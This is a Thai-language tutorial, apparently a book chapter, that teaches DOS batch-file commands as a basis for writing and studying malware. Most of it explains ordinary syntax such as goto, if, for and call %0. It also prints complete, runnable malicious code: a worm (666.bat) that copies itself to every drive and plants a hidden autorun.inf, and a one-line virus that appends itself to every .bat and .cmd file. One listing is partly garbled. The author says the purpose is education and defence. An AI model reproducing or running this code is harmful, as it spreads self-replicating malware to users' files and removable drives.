มัลลิคอยอัส ซอฟต์แวร์ หรือ Malware นั้น จำแนกได้หลายประเภท แต่ที่
ผู้ใช้คอมพิวเตอร์ แยกแยะกันไม่ค่อยจะออกกันซะเลยคือ ไวรัส กับ หนอน
คอมพิวเตอร์ ถ้าคุณเองเป็นผู้ถูกเล่นงานล่ะก็…ไม่สำคัญหลอกว่ามันจะเป็น
อะไร…แต่เกลียดมันอย่างเดียว…แต่ถ้าคุณเป็นผู้เขียนหรือผู้ที่ศึกษาด้าน
ความปลอดภัยระบบ…ขอบอกว่ามันจำแนกอย่างนี้
1. ไวรัสสามารถแพร่ตัวมันเองไปกับหนอนได้
2. หนอนคอมพิวเตอร์ไม่สามารถแพร่เชื้อใส่ไวรัสได้แต่อาศัยในม้าโทรจัน
ได้
3. ไวรัสสามารถฝั่งตัวในหนอน…และม้าโทรจันได้โดยไม่ต้องรอการเรียก
ใช้จากหนอนหรือม้าโทรจัน หรืออาศัยฝั่งอยู่ในรูปแบบของคำสั่งทำลายได้
อ่ะมาเข้าสู่…ปฐมภูมิของ แบทไฟล์ไวรัส
กรณีศึกษาเพื่อทำความเข้าใจเกี่ยวกับคำสั่งไวรัส
1. หนอนและไวรัสแบทช์ไฟล์
เจาะลึก DOS Batch File (ปูพื้นฐานการศึกษามัลแวร์)
Batch File คืออะไร…มันคือชุดคำสั่งที่รวบรวมคำสั่งบน Command Line (หรือคำสั่งบน หน้าต่าง Cmd ของ วินโดวส์ XP) ซึ่งในอดีต…DOS สร้างขึ้นมาเพื่อเป็นเมนูลัดบนระบบปฏิบัติการรุ่นโบราณที่ทำงานอยู่บน “คอนโซล(แป้นพิมพ์และจอภาพ)” เช่นการ CD \DOS คือการเข้าไปยัง Directory DOS หากจะพิมพ์ข้อความเหล่านั้นทั้งหมด…บ่อยๆ ครั้ง จะทำให้เสียเวลา DOS จึงให้สามารถนำคำสั่งที่ใช้บ่อยๆ มาบันทึกเป็นแฟ้มข้อความที่มีนามสกุล .BAT เพื่อให้สามารถพิมพ์ชื่อแฟ้ม .BAT นั้นและตามด้วย Enter ก็สามารถเรียกใช้คำสั่งทั้งหมดในนั้นได้คำสั่งเพียงคำสั่งเดียวคุณเองจำมันได้ จะกลายเป็นเส้นทางลัดและคำสั่งแบบซับซ้อน
ซึ่งตัวของ Batch File เองสามารถทำงานอะไรได้บ้าง…โอย…มันทำงานได้มากจนคุณเองคาดไม่ถึงเลย…ตั้งแต่การล็อกระบบ, ตรวจสอบข้อมูล Error หรือ, เขียนไวรัส…(อันสุดท้ายนี้ไม่ค่อยชอบนะแต่คุ้นเคย) และผู้อ่านที่บางคนไม่เคยแตะ…DOS มาก่อนจะศึกษาได้หรือเปล่า…ได้ครับ…แต่ต้องมีพื้นฐานต้องหาอ่านกันหน่อย ในหนังสือเล่มนี้จะอธิบายเฉพาะคำสั่งที่สำคัญๆ เท่านั้น…เพราะเกรงว่าถ้าอธิบายทุกๆ คำสั่งของ DOS เนื้อหาของหนังสือจะไม่พอครับ…
เอาล่ะ…ปูพื้นกันใหม่ด้วย DOS บนวินโดวส์เอ็กซ์พี…
DOS ที่ทำงานบนวินโดวส์ 32 บิต มันจะขยายการทำงานของ Environment Memory ที่คุณใช้กำหนดตัวแปรด้วยคำสั่ง SET และมันก็ทำงานร่วมกับชื่อแฟ้มข้อมูลที่มีขนาดยาวๆ ได้สบาย รวมถึงบรรจุคำสั่งภายใน (Internal Command) เอาไว้ในระบบวินโดวส์ ครับ…เป็นผลให้ตำรา DOS ที่คุณเคยเปิดอ่าน…เก็บมันใส่ลังได้เลยเพราะคำสั่งใหม่ๆ เพิ่มเข้ามาเพียบ…ผมเองก็นำมาสอนได้ไม่ทุกคำสั่งครับ…แต่มีรายชื่อคำสั่งภายใน (Internal Command) ให้คุณดูเล่นๆ ดังนี้ ASSOC, AT, ATTRIB, BREAK, CACLS, CALL, CD, CHCP, CHDIR, CHKDSK,CHKNTFS, CLS, CMD, COLOR, COMP, COMPACT, CONVERT, COPY, DATE,DEL, DIR, DISKCOMP, DISKCOPY, DOSKEY, ECHO, ENDLOCAL, ERASE,EXIT, FC, FIND, FINDSTR, FOR, FORMAT, FTYPE, GOTO, GRAFTABL,HELP, IF, LABEL, MD, MKDIR, MODE, MORE, MOVE, PATH, PAUSE, POPD, PRINT, PROMPT, PUSHD, RD, RECOVER, REM, REN, RENAME, REPLACE,RMDIR, SET, SETLOCAL, SHIFT, SORT, START, SUBST, TIME, TITLE, TREE, TYPE, VER, VERIFY, VOL, XCOPY นี้คือคำสั่งที่สามารถทำงานได้ทุกเวลาที่ วินโดวส์ทำงานครับ ไม่เหมือนกับ (External Command) เช่น EDIT.EXE, FDISK.EXE ซึ่งไวรัสเองสามารถลบแฟ้มคำสั่งเหล่านั้นทิ้ง ส่งผลให้ใช้คำสั่งนั้นไม่ได้ ตัวอย่างคือถ้าไวรัสลบแฟ้ม REG.EXE ทิ้งไปซะ จะทำให้ไม่สามารถแก้ไขระบบรีจีสตรีย์ ของวินโดวส์ได้ใน DOS Command และถ้าไวรัสลบแฟ้ม REGEDIT.EXE, REGEDIT32.EXE ทิ้งไปอีก ก็ไม่สามารถเข้ารีจีสตรีย์ ในวินโดวส์ได้เลย ทำให้การฆ่าไวรัสยากขึ้นอีกมาก อย่างไรก็ดี คุณรู้แล้วควรสำรองแฟ้มเหล่านี้เก็บเอาไว้เพื่อไม่ให้ถูกเล่นงานจากไวรัสแบบเซียน
คำสั่งบน DOS นั้น ประกอบด้วย…
[คำสั้งDOS]autorun] ไปยังแฟ้ม Autorun.inf เพื่อสร้างคำสั่งหนอน
echo shellexecute=666.bat >>%1:\autorun.inf
:: ส่งข้อความต่อท้ายในอีกบรรทัด shellexcute=666.bat เพื่อเรียกหนอนทำงานเมื่อ Autorun
attrib +s +h +r %1:\autorun.inf > nul
:: กำหนดให้แฟ้ม Autorun.inf เป็นแฟ้มระบบและซ่อนตัวและห้ามเขียน
:endbat
:: สิ้นสุดคำสั่งหนอน
จำแนกคำสั่งที่สำคัญในแบทช์ไฟล์…
1. คำสั่ง @ (คำสั่งซ่อนบรรทัดคอมมานด์ไลน์) คำสั่งนี้ ใช้กำหนดหน้าคำสั่ง Echo Off ซึ่งก็ทำงานเหมือนกับคำสั่งนี้เช่นกันแต่ คำสั่ง Echo Off จะไม่มีผลต่อคำสั่งของมันเอง…จึงต้องอาศัยคำสั่ง @ นำหน้าอีกทีเพื่อซ่อนบรรทัดคอมมานด์ไลน์อีกที แต่ถ้าภายในคำสั่งของ แบทช์ไฟล์มีบรรทัดที่น้อยมาก ก็อาจจะใช้ @ นำหน้าคำสั่งเหล่านั้นได้เลยเพื่อให้ประหยัดเนื้อที่คำสั่ง เช่น
@cls
@dir /as /s
หรือ
@echo off
cls
dir /as /s
2. คำสั่ง : (คำสั่งกำหนดตำแหน่งของชุดคำสั่ง) คำสั่งนี้คือการกำหนด ลาเบล (Label) หรือตำแหน่งของชุดคำสั่งดอสแต่ละคำสั่ง ซึ่งบางครั้ง อาจใช้กำหนดลูปการทำงานของชุดคำสั่งในแบทไฟล์เพื่อให้ทำงานแบบไม่มีวันหยุด เช่น
@echo off
:loop
:: ตำแหน่งเริ่มต้น
echo Loop Command
:: แสดงข้อความ
pause
:: รอรับคีย์บอร์ดใดๆ
goto Loop
:: วนกลับไปที่ตำแหน่งเริ่มต้น
สำหรับ :: (คำสั่งนี้ไม่มีในตำราใดๆ ครับ) เพราะเป็นการประยุกต์ใช้ คำสั่ง : แต่ทำการซ้อนกัน 2 ตัว เพื่อให้มันไม่ถูกเรียกใช้งานจากแบทช์ไฟล์ จึงมีค่าเท่ากับคำสั่ง REM (Remark หรือ หมายเหตุ) คำสั่งนี้ถูกประยุกต์ใช้งานในคู่มือการสอนเขียนแบทช์ไฟล์ในยุคแรกๆ มาตั้งนานแล้ว…เช่น
:: นี้คือหมายเหตุ
หรือ
rem นี้คือหมายเหตุ
3. คำสั่ง goto (คำสั่งย้ายการทำงานไปยังลาเบลที่กำหนด) คำสั่งนี้มีผลต่อลาเบลที่อยู่ภายในแบทไฟล์นั้น…และในวินโดวส์เอ็กซ์พี นี้สามารถกำหนดให้มันรับอากิวเมนต์ของคำสั่ง IF ERRORLEVEL ได้ด้วย (ดูเงื่อนไขใน Help ของ ดอส) ในคำสั่ง : ที่ผ่านมาตำแหน่งถูกต้อง แต่ถ้าชื่อของตำแหน่งไม่ถูกต้อง เช่น
:loop
:: กำหนดตำแหน่งวนคำสั่ง
@echo Loop Command
:: แสดงข้อความเมื่อวนการทำงาน
@goto Looop
:: ไปยังตำแหน่ง Looop ซึ่งไม่มีอยู่ในคำสั่ง
@echo Error Me
:: คำสั่งนี้จะไม่สามารถทำงานได้
จากตัวอย่างคำสั่งของแบทช์ไฟล์ไม่สามารถทำงานได้สมบรูณ์ เพราะคำสั่ง Looop นั้นไม่มีอยู่เนื่องจากผู้เขียนเติม o (โอ) เพิ่มเข้าไปอีกตัวจึงทำให้อ่านตำแหน่งผิดพลาด เป็นผลให้คำสั่งที่ต่อท้ายลงมาไม่สามารถทำงานได้ แต่คำสั่ง goto นั้นมีข้อดีตรงที่ไม่แยกแยะตัวพิมพ์เล็กหรือพิมพ์ใหญ่ เช่น
:LooP
:: กำหนดตำแหน่งวนการทำงานเป็นตัวพิมพ์เล็กและพิมพ์ใหญ่
@echo Loop Command
:: แสดงข้อความเมื่อวนการทำงาน
@goto loop
:: ไปยังตำแหน่ง LooP โดยไม่สนใจตัวพิมพ์เล็กหรือพิมพ์ใหญ่
หมายเหตุ หากคำสั่งของแบทช์ไฟล์ทำงานไม่หยุด…ให้คุณกด {Ctrl+Break} เพื่อหยุดการทำงานของมัน
4. คำสั่ง if not “%1” == “” ทำคำสั่ง (คำสั่งตัดสินใจ ถ้า พารามิเตอร์ที่ 1 ไม่มีตัวอักษร ให้ทำ) คำสั่งนี้จะใช้ต่อเมื่อต้องการดูว่าพารามิเตอร์ที่ต่อท้ายแฟ้มแบทช์ไฟล์มีหรือไม่ เช่น สมมุติให้แฟ้มแบทช์ไฟล์นี้ชื่อ test.bat
C:\>test command1
หมายถึง ส่งคำว่า command1 ไปประมวลผลในแฟ้มชื่อ test.bat และคำสั่งนั้นคือ %1 และหากสมมุติว่า เว้นวรรค และพิมพ์ command2 ต่อท้าย command1 ดูตัวอย่าง
C:\>test command1 command2
คำว่า command2 จะถูกเรียกว่า พารามิเตอร์ที่ 2 แทนด้วย %2 ในทันที ซึ่งในแบทไฟล์นั้นสามารถรับได้สูงสุด 9 พารามิเตอร์ คือ %1 ถึง %9 ซึ่งก็มากดพอดู แต่หากแบทช์ไฟล์ของคุณต้องการพารามิเตอร์ที่มากกว่านั้น คงต้องศึกษาคำสั่ง shift เพิ่มเติมใน Help บนดอสของวินโดวส์เอ็กซ์พีกันอีกที
กลับมาที่ if not “%1” == “” (ให้ทำ) ว่ามันทำงานอย่างไร ในคำสั่ง If นั้นมีกิ่งก้านสาขาของคำสั่งที่มากครับ…ผมเองก็ไม่สามารถนำมาอธิบายให้ได้หมด…แต่ถ้าต้องการศึกษาให้ลึกซึ้งคงต้องพึ่งพา Help กันนะครับ…ทีนี้มาดูซิว่าทำไม่ if “%1” == “” (ให้ทำ) หรือ if not “%1” == “” (ให้ทำ) ถึงต้องมีเครื่องหมาย “” (อัญประกาศ) กำหนดพารามิเตอร์ที่ 1 ทั้งนี้ทั้งนั้นเป็นเพราะว่า if %1 == (ให้ทำ) จะเห็นว่าชุดคำสั่งไม่สมบรูณ์ ถ้าบอกดอสให้ทราบว่า %1 นั้นต้องการเปรียบเทียบกับอะไรอยู่ เพราะ ถ้าคุณเว้นว่างเอาไว้เฉยๆ จะทำให้ดอสทำงานผิดพลาดนั้นเอง ซึ่งโดยปกติแล้ว if %1 == %2 (ให้ทำ) จะสามารถเปรียบเทียบกันได้ทันที…โดยไม่ต้องระบุเครื่องหมายอัญประกาศหรือเครื่องหมายอื่นๆ นำหน้ามันเพราะ แบทช์ไฟล์เป็นภาษาสคริปที่ประมวลข้อความ (การประมวลผลการคำนวนนั้นเพิ่งจะเริ่มมีในวินโดวส์เอ็กซ์พีเป็นต้นมา) จากตัวอย่างพอจะอธิบายออกมาเป็นรูปแบบดังนี้
@if “%1” == “” echo มีการกำหนดพารามิเตอร์ที่ 1
:: ถ้าพารามิเตอร์ที่ 1 ไม่มีข้อความแสดงข้อความ
@if not “%1” = “” echo ไม่มีการกำหนดข้อความ
:: ถ้าพารามเตอร์ไม่มีข้อความแสดงข้อความผิดพลาด
หรือ
@if “%1” == “” (echo กรุณาระบุข้อความ ) else (echo ข้อความคือ %1)
:: เงื่อนไขนี้ใช้บนวินเอ็กซ์พีขึ้นไปเพราะดอสรุ่นเก่าๆ ไม่สามารถกำหนดเงื่อนไขแบบนี้ได้
อย่างไรก็ดี…ผมก็อยากจะบอกน้องๆ นักศึกษาที่ไม่ได้เรียนรู้ภาษาคอมพิวเตอร์มาก่อนหรืออาจจะเคยเรียนแต่ยังไม่คล่องเกี่ยวกับเงื่อนไขการคำนวนของภาษาคอมพิวเตอร์ว่า … คำสั่ง IF… ELSE … นั้นเป็นหัวใจสำคัญของทุกๆ ภาษาในการเขียนโปรแกรมคอมพิวเตอร์ ฉนั้น…ควรทำความเข้าใจอย่างมากในการศึกษาเงื่อนไขของคำสั่งนี้…ไม่ใช่เพื่อการเขียนไวรัสเท่านั้น…แต่มันเป็นเงื่อนไขสำคัญในการเขียนโปรแกรมฆ่าไวรัสด้วย…คำสั่งนี้คำสั่งเดียวสามารถทำให้โปรแกรมมีขนาดยาวหรือสั้นหรือทำงานได้รวดเร็วกว่า ผู้ที่เขียนโปรแกรมด้วยกัน
5. คำสั่ง for %%ตัวแปร in (ชุดข้อมูล) do ทำคำสั่ง (สำหรับ %%ตัวแปร จาก ชุดข้อมูล ทำ คำสั่ง) คำสั่งนี้มีไว้สำหรับการประมวลผลแบบหลายข้อมูลภายในคำสั่งเดียว เช่น
@for %%l in (bat vbs js) do dir *.%%l
:: สำหรับ ตัวแปร l ให้ dir แฟ้มนามสกุล *.bat, *.vbs และ *.js
จะเป็นการทำงานกับหลายแฟ้มหรือหลายๆ ชุดข้อมูล โดยต้องเว้นวรรค ขั้นแต่ละชุดข้อมูลเอาไว้ และใช้ตัวแปร %%l ซึ่งต้องมีเครื่องหมาย %% นำหน้าเพื่อบ่งบอกว่าเป็นตัวแปรที่มาจากชุดคำสั่ง for ถ้าไม่บ่งบอกให้ถูกหลักอาจจะทำให้คำสั่งทำงานผิดพลาดอย่างมาก มาดูตัวอย่างอีกตัวอย่างเพื่อความกระจ่างอีกที เช่น
@for %%d in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%d:\autorun.inf echo %%d: Werning!
:: สำหรับตัวแปร d ถ้าพบแฟ้ม (ตัวแปร d แทนไดร์ฟข้อมูล):\autorun.inf แสดงข้อความเตือน (ตัวแปร d แทนไดร์ฟข้อมูล): Werning!
ซึ่งรูปแบบของคำสั่ง…ไม่มีอะไรซับซ้อน…เพียงแต่ต้องอ้างถึงรูปแบบของตัวแปรให้ถูกต้อง…ก็สามารถทำงานได้ตามเป้าหมาย สำหรับเงื่อนไขของคำสั่ง FOR เชิงลึก คือ FOR /F และเงื่อนไขอื่นๆ นั้นผมไม่ขออธิบายเพราะมันจะทำให้หนังสือเล่มนี้ดูเป็นหนังสือเชิงอ้างอิง…ซึ่งผมไม่ตั้งใจให้เป็นเช่นนั้น เพราะวัตถุประสงค์ของผมต้องการให้ผู้อ่าน ปฏิบัติและทดลองและเพื่อกระตุ้นการศึกษาค้นคว้าเพิ่มเติมต่อไป…จึงย้ำอีกทีว่าหนังสือเล่มนี้…เป็นเชิงปฏิบัติการณ์
6. คำสั่ง call %0 %%d (เรียกใช้แบทไฟล์ที่ทำงานอยู่ พร้อมส่งตัวแปรไปยังพารามิเตอร์ที่ 1) คำสั่งนี้จะทำให้แบทไฟล์เกิดการทำงานแบบ Overflow หรือ Error ได้เนื่องจาก ถ้าเขียนคำสั่งควบคุมนี้ไม่เป็นมันจะส่งผลให้หน่วยความเต็มได้…หรือเกิดการวนการทำงานของแบทไฟล์แบบไม่มีวันจบ เหมือนกับคำสั่ง goto เพียงแต่คำสั่งนี้จะส่งผลโดยตรงต่อหน่วยความจำ เช่น
@echo Me Activeting…
:: แสดงข้อความว่ากำลังทำงาน
@call %0
:: เรียกแฟ้มนี้ขึ้นมาทำงานอีก
จากตัวอย่าง คำสั่งดังกล่าวจะทำงานแบบไม่มีวันจบ…รอจนกว่า ระบบปฏิบัติการณ์จะแสดงข้อความผิดพลาดในเรื่องการจัดการหน่วยความจำ หรือโปรแกรมอาจทำให้เครื่องค้างไปเลย จึงต้องระวังอย่างมากในการอ้างถึง %0 หรือ พารามิเตอร์ หลัก คือ ชื่อแฟ้มคำสั่งนั้นเอง ซึ่งโดยปกติแล้ว…จะไม่มีโปรแกรมแบทช์ไฟล์ใดอ้างถึงชื่อแฟ้มคำสั่งเพื่อมาประมวลผล…นอกเสียจากเป็น “มัลแวร์” หรือ “คำสั่งฆ่ามัลแวร์” จึงต้องแยกแยะให้ดีหากจะเขียนโปรแกรมฆ่าไวรัสจำพวกนี้….
มาดูตัวอย่างเพื่อทำความเข้าใจเกี่ยวกับการใช้คำสั่ง Call กันอีกตัวอย่าง เช่น
@echo Me Activeting…
:: แสดงข้อความ
@call %0
:: เรียกแฟ้มนี้ขึ้นมาทำงาน
@%0
:: กระโดดการทำงานไปยังแฟ้มที่เรียกใช้ คือ แฟ้มนี้ (คำสั่งนี้ไม่มีโอกาสได้ทำงาน)
จากตัวอย่าง ดูเหมือนว่า คำสั่งน่าจะทำงานแบบสิ้นสุด…แต่ไม่สิ้นสุดเพราะว่า คำสั่ง call จะถูกเรียกใช้ก่อน ทุกๆ ครั้งที่รันแบทซ์ไฟล์ จึงทำให้คำสั่ง %0 นั้นไม่สามารถทำงานได้…ในเครื่องที่ผมทดลองคือระบบปฏิบัติการวินโดวส์เอ็กซ์พีนั้น…มันจะแสดงหน้าต่างขึ้นมาสักพักและจะปิดตัวลง แต่ถ้าเรามาเขียนในทางกลับกัน เช่น
@echo Me Activeting…
:: แสดงข้อความ
@%0
:: กระโดดการทำงานไปยังแฟ้มที่เรียกใช้ คือ แฟ้มนี้
@call %0
:: เรียกแฟ้มนี้ขึ้นมาทำงาน (คำสั่งนี้ไม่มีโอกาสได้ทำงาน)
จากตัวอย่าง คำสั่งนี้จะไม่ปิดตัวเองลงไป…เพราะมันทำงานคล้ายคำสั่ง goto ส่งผลให้หน่วยความจำไม่ได้ถูกใช้ไปมากและการวนลูปการทำงานก็ยังดำเนินต่อไปอย่างไม่สิ้นสุด แต่ถ้าเราเพิ่มคำสั่งจัดการมันให้เต็มรูปแบบด้วยเงื่อนไข…จะทำให้มันทำงานได้อย่างราบรื่น เช่น
@echo Me Activeting…Parameter is %1
:: ถ้าไม่มีพารามิเตอร์ ใดๆ จะแสดงข้อความ Me Activeting…Parameter is
@if “%1” == “” %0 Again
:: ถ้าพารามิเตอร์ว่าง จะส่งคำว่า Again เป็นพารามิเตอร์ (และกระโดดการทำงานไปโดยไม่สนใจคำสั่ง ด้านล่าง)
@if “%1” == “Again” Call %0 End
:: ถ้าพารามิเตอร์เป็น Again จะเรียกแฟ้มนี้ใหม่ ส่งคำว่า End เป็น พารามิเตอร์ และจบการทำงานเพราะ ไม่มีเงือนไขการตัดสินใจ
เอาล่ะ…มาถึงตอนนี้ก็พอจะรู้เกี่ยวกับคำสั่งที่จำเป็นหมดแล้ว…เหลือแต่การประยุกต์คำสั่งดอสทั้งหมดมาเขียนเป็นมัลแวร์ ซึ่งไม่มีใครสามารถบอกได้หลอกว่า หนอนของใครเจ๋ง หรือไวรัสของใครร้ายกาจ เพราะมันไม่ใช่วัตถุประสงค์ของหนังสือเล่มนี้… ผู้เขียน เผยแพร่คำสั่งเหล่านี้เพื่อให้พวกคุณเป็น นักทดลองที่รู้ทั้งวิธีการทำงานของมันและวิธีป้องกันมันอย่างเต็มตัวเพราะการศึกษาเครื่องมือฆ่าคน หรือ วิชาชีพบางวิชาชีพนั้น…ก็ต้องศึกษาทั้งที่ไปที่มาของการแก้ปัญหาทั้งสิ้น หากจะเป็นวิสัญญีแพทย์ชั้นหนึ่ง…ไม่จำเป็นต้องลงมือฆ่าคน…แต่ต้องเรียนรู้จากคนที่โดนฆ่าหรือตายไปแล้ว…เพื่อเข้าใจหลักการตายและหลักการรักษาและป้องกันอย่างดี เช่นกันครับ…หนอนคอมพิวเตอร์ที่ได้ยกตัวอย่างไปนั้น…ขอให้นึกซะว่า…เป็นครูใหญ่ของพวกคุณแล้วกัน
อาวุธอันร้ายกาจไม่ใช่หนอน…แต่เป็นไวรัส!
เอาล่ะ…คุณหลายคนอาจจะอ่านเนื้อหาตอนต้นซึ่งเป็นนิยามต่างๆ ทางคอมพิวเตอร์กันบ้างแล้ว…แต่ตอนนี้มาทำการแยกแยะกันด้วยรูปแบบของคำสั่งว่า…”อะไรกันคือหนอนคอมพิวเตอร์ และอะไรคือไวรัสคอมพิวเตอร์” เริ่มเลย…
%virus%@echo off&cd\&for /r %%f in (*.bat *.cmd) do ((findstr “virus” “%%f”>nul)&(if errorlevel 1 (echo.>>”%%f”&findstr “virus” “%0″>>”%%f” ))) ตัวอย่างด้านบนนี้แหละ…คือคำสั่งอันร้ายกาจ หรือเรียกมันว่า “ไวรัสคอมพิวเตอร์” เพียงบรรทัดเดียวมันสามารถทำให้คุณทึ่งกับการทำงานของมัน เพราะอะไร…ทำให้มันมีอะไรที่พิเศษกว่าหนอนคอมพิวเตอร์คือ
1. มันสามารถแทรกคำสั่งไวรัสคอมพิวเตอร์ไปยังหนอนคอมพิวเตอร์ได้เสียด้วย (โอ้…เป็นปาราสิตที่อาศัยหนอนคอมพิวเตอร์เป็นพาหะนำโรคได้ด้วย)
2. มันสามารถติดเชื้อแฟ้มคำสั่งที่ไม่ใช้หนอนคอมพิวเตอร์ได้ด้วยตัวของมันเอง…ไม่พึ่งพาใคร…ส่งผลให้แฟ้มที่ติดไวรัสเป็นพาหะนำโรคอีกต่อหนึ่งและยังไม่สามารถกำจัดมันได้โดยง่าย…เพราะมันเป็นส่วนหนึ่งในคำสั่งเหล่านั้น
3. ไวรัสคอมพิวเตอร์ต้องใช้ทักษะทางคอมพิวเตอร์ที่สูงกว่าหนอนคอมพิวเตอร์ในด้านโครงสร้าง เพราะ “มันคือชุดคำสั่งที่สามารถจำลองชุดคำสั่งไวรัสไปยังเป้าหมายได้โดยไม่ส่งผลกระทบต่อเป้าหมายเพื่อฝั่งชุดคำสั่งนั้นและรอการแพร่เชื้อชุดคำสั่งนั้นต่อไป”
อธิบายกันให้กระจ่างอีกที…?
สมมุต ว่าเครื่องของคุณติดหนอนคอมพิวเตอร์ คือ 666.bat ในทุกๆ ไดร์ฟ แต่ถ้าเกิดมีไวรัสคอมพิวเตอร์ต่อไปนี้ติดเชื้อในเครื่องของคุณด้วยมันจะส่งผลให้แฟ้มคำสั่งของหนอนคอมพิวเตอร์ (666.bat) มีขนาดโตขึ้นตามขนาดของไวรัส เช่น
@echo off
if not “%1″==”” goto Interface
for %%d in (c d e f g h i j k l m n o p q r s t u v w x y z) do call %0 %%d
Start .
goto endbat
:Interface
type 666.bat >%1:\666.bat
attrib +s +h +r %1:\666.bat > nul
attrib -r -h -s %1:\autorun.inf>nul
echo [autorun] > %1:\autorun.inf
echo shellexecute=666.bat >>%1:\autorun.inf
attrib +s +h +r %1:\autorun.inf > nul
:endbat
%virus%@echo off&cd\&for /r %%f in (*.bat *.cmd) do ((findstr “virus” “%%f”>nul)&(if errorlevel 1 (echo.>>”%%f”&findstr “virus” “%0″>>”%%f”))) ตัวหนังสือเข้ม คือคำสั่งไวรัสที่เพิ่มเข้ามาต่อท้ายคำสั่งของหนอนคอมพิวเตอร์ โดยที่ไวรัสในตัวอย่างนี้ทำงานแบบฉลาดพอที่จะรู้ว่า แฟ้มแบทช์ไฟล์ใด ที่ติดไวรัสแล้ว…หรือแฟ้มแบทช์ไฟล์ใดยังไม่มีการติดไวรัส เมื่อแฟ้มดังกล่าวติดไวรัสแล้ว…จะส่งผลให้…หนอนคอมพิวเตอร์ตัวนี้ไม่ว่าจะติดเชื้อในเครื่องคอมพิวเตอร์เครื่องใดๆ ก็ตามมันจะนำเชื้อไวรัสที่มันติดเชื้ออยู่ไปกับมันด้วย…ส่งผลให้ไวรัสคอมพิวเตอร์สามารถระบาดในทุกๆ เครื่อง…และทุกๆ แฟ้มที่เป็น แบทช์ไฟล์ในเครื่องของคุณ
(ไวรัสนี้ไม่สามารถทำงานใน DOS Mode รุ่นเก่าๆ อย่าง Windows Me ได้) ตัวอย่างนี้ก็มีข้อบกพร่อง อยู่ตรงที่ มันไม่สามารถทำงานใน DOS ระดับพื้นฐานได้ ถ้าหากว่ามันติดเชื้อในแฟ้ม AUTOEXEC.BAT ก็ไม่สามารถทำงานได้ เพราะ AUTOEXEC.BAT นั้นทำงานใน DOS Mode ขั้นพื้นฐานคำสั่งบางคำสั่งของมันไม่สามารถให้บริการบนโหมดนี้
มาแยกชิ้นส่วนของไวรัสเพื่อทำการศึกษากัน…
1. คำสั่ง cd\ (ออกไปยัง Root Directory) คำสั่งนี้เป็นคำสั่งพื้นฐานของดอสอยู่แล้วคงไม่ต้องอธิบายอะไรมาก ถ้าคุณใช้คำสั่ง CD WINDOWS หรือ CD “PROGRAM FILES” เพื่อเข้าไปยัง โฟลเดอร์ต่างๆ จนคุ้นเคย แต่บนวินโดวส์เอ็กซ์พี คำสั่ง CD W* ก็มีค่าเท่ากับ CD WINDOWS เหมือนกัน (เพียงแต่รูปแบบสั้นกว่า ด้วย White Card) และถอยขึ้นมายังรูทไดเร็คทอรี่ 1 ลำดับ ด้วยการ CD.. ซึ่งดูรูปแบบคำสั่งเพิ่มเติมด้วยคำสั่ง CD /?
2. คำสั่ง for /r %%ตัวแปร in (รายการ) do ทำคำสั่ง (สำหรับค้นหาแฟ้มในรายการเพื่อทำคำสั่ง) คำสั่งนี้ใช้งานบนวินโดวส์เอ็กซ์พีขึ้นไป โดยจะแตกต่างจากคำสั่ง FOR แบบธรรมดา ตรงที่มันมีเงื่อนไข /R ซึ่งเป็นเงื่อนไขที่บ่งบอกให้ตัวแปรที่กำหนดเก็บรายชื่อแฟ้มภายในซับโฟลเดอร์ที่ทำงานลงไปทุกตัว จึงทำให้การเขียนไวรัสเป็นไปโดยง่ายเพราะ แค่คำสั่งเดียวก็ลิสต์รายชื่อแฟ้มออกมาดีกว่าคำสั่ง DIR เสียอีก เช่น
@for /r %%f in (*.*) do echo %%f
:: แสดงรายชื่อทุกแฟ้มจากโฟลเดอร์ที่ทำงานลงไปยังซับโฟลเดอร์ทั้งหมด
3. คำสั่ง findstr “ข้อความ” แฟ้มข้อมูล (ค้นหาข้อความในแฟ้มข้อมูลที่กำหนด) คำสั่งนี้ใช้งานบนวินโดวส์เอ็กซ์พีขึ้นไปเช่นกัน แต่เดิม คำสั่ง FIND.EXE จะทำหน้าที่นี้อยู่ แต่ในวินโดวส์เอ็กซ์พีได้บรรจุคำสั่งนี้เป็นคำสั่งภายในแล้ว แต่รูปแบบการทำงานจะคล้ายคำสั่ง FIND.EXE ตัวเดิม ซึ่งแต่เดิมคำสั่ง FIND.EXE นั้นในภาษาแอสเซมบลีตอนท้ายคำสั่ง จะมีการเรียกใช้ฟังก์ชั่น
MOV AH,4CH ; เรียกฟักช์ชั่นคืนผลลัพธ์ไปยังดอสและจบการทำงาน
INT 21H ; อินเตอร์รัพต์ของดอสโปรเซส
คำสั่งนี้มีผลทำต่อการคำนวนของแบทซ์ไฟล์คือ IF ERRORLEVEL ค่าของ “AL” ในโปรแกรมที่จบการทำงาน
จะถูกส่งผ่านมาให้คำนวนต่อไป…ซึ่งทุกๆ คำสั่งของดอสนั้นมีทั้งสิ้น…เพียงแต่ไม่มีเอกสารเผยแพร่ออกมาให้เห็นกันเพราะบาง ERROR นั้น ถูกเก็บเป็นความลับของระบบปฏิบัติการ แต่นักเขียนโปรแกรมบางคน ก็ใช่รูปแบบการตัดสิ้นใจแบบง่าย เพื่อดูคำสั่งผิดพลาดนั้นได้ด้วยการไล่ดูทุกๆ ค่า หรือ แค่ดูว่า IF ERRORLEVEL 1 นั้นคือมีข้อผิดพลาดเกิดขึ้นแต่ไม่สนใจว่าผิดพลาดอะไร…
4. คำสั่ง if errorlevel หมายเลข ทำคำสั่ง (ถ้ามีข้อผิดพลาดในหมายเลขทำตามคำสั่งนั้น) คำสั่งนี้เป็นคำสั่งที่ทำให้ไวรัสฉลาดขึ้นอย่างมากคือ…”ถ้าเกิดข้อผิดพลาดใดๆ ในการค้นหาข้อความ (virus) ไม่พบ จะติดเชื้อแฟ้มนั้นทันที” ซึ่งเป็นการตัดสินใจที่ชาญฉลาด…เพราะจะทำให้ไวรัสไม่ถูกเขียนซ้ำไปซ้ำมาบนแฟ้มที่ติดเชื้อไวรัส ซึ่งผู้เขียน เอง ศึกษาคำสั่งนี้มานาน…และก็ใช่อย่างคล่องแคล้วในการเขียนโปรแกรมฆ่าไวรัส แต่สำหรับผู้อ่านที่เริ่มศึกษาคำสั่ง แบทช์ไฟล์ ต้องทบทวนคำสั่งนี้เพิ่มเติมใน IF /? ในดอส เพื่อดูรูปแบบของคำสั่งที่แน่นอนรวมทั้งคำสั่งการตัดสินใจในรูปแบบอื่นๆ เพื่อเสริมความเก่งกาจในประสบการณ์ด้านนี้ต่อไป